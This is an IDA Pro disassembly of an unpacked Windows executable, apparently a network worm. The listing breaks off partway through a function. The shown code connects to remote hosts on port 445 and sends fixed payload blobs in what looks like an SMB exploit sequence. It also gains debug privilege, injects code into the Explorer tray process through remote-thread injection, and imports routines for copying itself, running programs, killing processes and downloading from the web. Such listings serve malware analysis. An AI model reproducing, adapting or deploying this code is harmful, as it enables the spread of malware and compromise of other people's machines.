;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 272DA55EF88001468F90A908BEB709A1
; File Name : u:\work\272da55ef88001468f90a908beb709a1_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31000000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31001000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31001000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31001004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31001008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3100100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31002264+1D�r
dword_31001010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31001014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31002264+4E�r ...
dword_31001018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3100101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31001020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31001024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31001028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3100102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31001030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31001034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31001038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_31001040 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_31001044 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_31001048 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_3100104C dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31001050 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_31001054 dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31001058 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_310026A6+37�r
dword_3100105C dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_310026A6+3D�r
dword_31001060 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31001064 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31001068 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3100106C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31001070 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31001074 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31001078 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31002542+8F�r
dword_3100107C dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31001262+272�r ...
dword_31001080 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31001ADF+E2�r ...
dword_31001084 dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_31001088 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_3100108C dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31001851+2C�r
dword_31001090 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_31001E06+A4�r
dword_31001094 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_31001098 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_310019B3+19�r ...
dword_3100109C dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_31002310+92�r
dword_310010A0 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31001D8A�r
dword_310010A4 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_310010A8 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_310010AC dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_310019B3+12�r
dword_310010B0 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_310010B4 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_310010B8 dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_310010BC dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_31001C18+66�r ...
dword_310010C0 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_310010C4 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_310010C8 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_310026A6+8F�r
dword_310010CC dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31002476+C3�r
dword_310010D0 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_310010D4 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31002476+F�r
dword_310010D8 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_310010DC dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_310010E0 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_3100202D+58�r
align 8
dword_310010E8 dd 77C46EB0h ; resolved to->MSVCRT.memcmpdword_310010EC dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31002928+68�r
; ---------------------------------------------------------------------------
loc_310010F0: ; DATA XREF: UPX0:loc_31002BD0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_310010F4 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_31002310+79�r ...
dword_310010F8 dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31001AC9+1�r ...
dword_310010FC dd 77C371BCh ; resolved to->MSVCRT.sranddword_31001100 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_31001104 dd 77C478A0h ; resolved to->MSVCRT.strlendword_31001108 dd 77C475F0h ; resolved to->MSVCRT.memset align 10h
dword_31001110 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31001114 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31001118 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_3100111C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_31001ADF+8B�r ...
dd 0
dword_31001124 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_31002A44+B3�r
dword_31001128 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_31002A44+9E�r
dword_3100112C dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_31002A44+89�r
dword_31001130 dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31001134 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:31002184�r
dd 0
dword_3100113C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31001140 dd 71AB3E00h ; resolved to->WS2_32.binddword_31001144 dd 71AB88D3h ; resolved to->WS2_32.listendword_31001148 dd 71AC1028h ; resolved to->WS2_32.acceptdword_3100114C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31001150 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31001154 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_31001158 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_31001C18+AC�r
dword_3100115C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_310020F4+D�r
dword_31001160 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_31001C18+F0�r
dword_31001164 dd 71AB406Ah ; resolved to->WS2_32.connectdword_31001168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_31001ADF+67�r ...
dword_3100116C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_31001262+1D8�r ...
dword_31001170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_31001ADF+11B�r
dword_31001174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_31001ADF+122�r
align 10h
dword_31001180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
; =============== S U B R O U T I N E =======================================
sub_31001190 proc near ; CODE XREF: sub_31002928+BF�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31001034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_310011BD
push 8
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_310011BD
push 1
pop eax
jmp short loc_310011DB
; ---------------------------------------------------------------------------
loc_310011BD: ; CODE XREF: sub_31001190+19�j
; sub_31001190+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31001038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_310011DB: ; CODE XREF: sub_31001190+2B�j
pop edi
pop esi
pop ebx
retn
sub_31001190 endp
; =============== S U B R O U T I N E =======================================
sub_310011DF proc near ; CODE XREF: sub_31002928+10F�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3100102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31001030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_310011DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310011FB proc near ; CODE XREF: sub_31002928+EA�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3100101C ; CryptCreateHash
test eax, eax
jnz short loc_31001221
push 1
pop eax
jmp short loc_3100125E
; ---------------------------------------------------------------------------
loc_31001221: ; CODE XREF: sub_310011FB+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31001020 ; CryptHashData
test eax, eax
jnz short loc_3100123A
push 2
pop edi
jmp short loc_31001253
; ---------------------------------------------------------------------------
loc_3100123A: ; CODE XREF: sub_310011FB+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31001024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_31001253: ; CODE XREF: sub_310011FB+3D�j
push [ebp+arg_0]
call dword_31001028 ; CryptDestroyHash
mov eax, edi
loc_3100125E: ; CODE XREF: sub_310011FB+24�j
pop edi
pop esi
pop ebp
retn
sub_310011FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001262 proc near ; CODE XREF: sub_31001F41+36�p
; sub_31001FA5+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31002BA0
mov eax, dword_310049CC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_310049D0
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31001158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_310017C2
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3100115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_31001084 ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_310049C0
push eax
call dword_3100111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_310012D5: ; CODE XREF: sub_31001262+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_310012D5
push 60h
lea eax, [ebp+var_E4]
push offset dword_310044E0
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31002B92 ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31002B98 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31002B92 ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31002B92 ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31002B92 ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31002B98 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31002B8C ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31002B8C ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31001160 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31001164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_310017B8
mov esi, dword_31001080
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_31001168
push 89h
push offset dword_310042C8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0A8h
push offset dword_31004354
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0DEh
push offset dword_31004400
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
cmp eax, 46h
jl loc_310017AD
cmp [ebp+var_730], 31h
jnz loc_31001658
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31002B8C ; memset
add esp, 0Ch
push offset byte_31004000
call dword_3100107C ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_31004000
push eax
call sub_31002B98 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_3100107C ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31002B98 ; memcpy
mov eax, dword_31004906
add esp, 0Ch
mov [ebp+var_798], eax
loc_310014F9: ; CODE XREF: sub_31001262+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 68h
push offset dword_31004544
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0A0h
push offset dword_310045B0
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
cmp [ebp+arg_0], 0
jz loc_31001748
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31004768
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31002B98 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_310047D4
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31002B98 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31004848
push eax
call sub_31002B98 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_310017A0
; ---------------------------------------------------------------------------
loc_31001658: ; CODE XREF: sub_31001262+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31002B8C ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31004940
push eax
call sub_31002B98 ; memcpy
push offset byte_31004000
call sub_31002B92 ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_31004000
push eax
call sub_31002B98 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_310049B8
push eax
call sub_31002B98 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31004940
push eax
call sub_31002B98 ; memcpy
add esp, 40h
push offset byte_31004000
call sub_31002B92 ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_31004000
push eax
call sub_31002B98 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_310016F4: ; CODE XREF: sub_31001262+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_310016F4
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31002B8C ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31002B8C ; memset
add esp, 18h
jmp loc_310014F9
; ---------------------------------------------------------------------------
loc_31001748: ; CODE XREF: sub_31001262+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31004654
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31002B98 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_310046D4
push eax
call sub_31002B98 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_310017A0: ; CODE XREF: sub_31001262+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_310017AD: ; CODE XREF: sub_31001262+1AD�j
; sub_31001262+1E1�j ...
push 2
push [ebp+var_4]
call dword_31001170 ; shutdown
loc_310017B8: ; CODE XREF: sub_31001262+166�j
push [ebp+var_4]
call dword_31001174 ; closesocket
pop esi
loc_310017C2: ; CODE XREF: sub_31001262+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_31001262 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310017C9 proc near ; CODE XREF: UPX0:loc_31001DCA�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_31001090 ; LoadLibraryA
mov esi, dword_3100108C
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_3100184D
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_3100184D
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_3100184D
lea eax, [ebp+var_C]
push eax
push 20h
call dword_31001088 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_3100184D: ; CODE XREF: sub_310017C9+28�j
; sub_310017C9+37�j ...
pop edi
pop esi
leave
retn
sub_310017C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001851 proc near ; CODE XREF: UPX0:31001DDE�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31004FD0
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_310010A0 ; GetModuleHandleA
mov esi, dword_3100108C
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31001898
loc_31001894: ; CODE XREF: sub_31001851+54�j
push 1
jmp short loc_310018E9
; ---------------------------------------------------------------------------
loc_31001898: ; CODE XREF: sub_31001851+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_31001894
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31001110 ; FindWindowA
test eax, eax
jnz short loc_310018C6
call dword_31001114 ; GetForegroundWindow
test eax, eax
jnz short loc_310018C6
push 2
jmp short loc_310018E9
; ---------------------------------------------------------------------------
loc_310018C6: ; CODE XREF: sub_31001851+65�j
; sub_31001851+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31001118 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_3100109C ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_310018EC
push 3
loc_310018E9: ; CODE XREF: sub_31001851+45�j
; sub_31001851+73�j
pop eax
jmp short loc_31001957
; ---------------------------------------------------------------------------
loc_310018EC: ; CODE XREF: sub_31001851+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_31001098
test eax, eax
jz short loc_3100194A
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_31001094 ; WriteProcessMemory
push dword_31004FC4
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31001936
push eax
call esi ; CloseHandle
jmp short loc_31001951
; ---------------------------------------------------------------------------
loc_31001936: ; CODE XREF: sub_31001851+DE�j
push offset aUterm13 ; "uterm13"
call sub_3100198A
pop ecx
mov [ebp+var_4], 5
jmp short loc_31001951
; ---------------------------------------------------------------------------
loc_3100194A: ; CODE XREF: sub_31001851+B2�j
mov [ebp+var_4], 4
loc_31001951: ; CODE XREF: sub_31001851+E3�j
; sub_31001851+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_31001957: ; CODE XREF: sub_31001851+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31001851 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3100195C proc near ; CODE XREF: sub_31001C18+B�p
; UPX0:31001DA0�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_310010A4 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_310010FC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_3100195C endp
; =============== S U B R O U T I N E =======================================
sub_3100198A proc near ; CODE XREF: sub_31001851+EA�p
; UPX0:31001DAA�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_310010A8 ; CreateMutexA
retn
sub_3100198A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001999 proc near ; CODE XREF: sub_31001E06+E3�p
; sub_31001E06+EE�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_310010AC ; CreateThread
pop ebp
retn
sub_31001999 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310019B3 proc near ; CODE XREF: sub_31001C18+12C�p
; sub_31001FA5+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_310010AC ; CreateThread
push eax
call dword_31001098 ; CloseHandle
pop ebp
retn
sub_310019B3 endp
; =============== S U B R O U T I N E =======================================
sub_310019D4 proc near ; CODE XREF: sub_31002476+3B�p
; sub_31002542+64�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_310019FC
loc_310019E5: ; CODE XREF: sub_310019D4+26�j
call dword_310010F8 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_310019E5
loc_310019FC: ; CODE XREF: sub_310019D4+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_310019D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001A04 proc near ; CODE XREF: sub_310026A6+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31002B8C ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_310010B0 ; CreateProcessA
push [ebp+var_C]
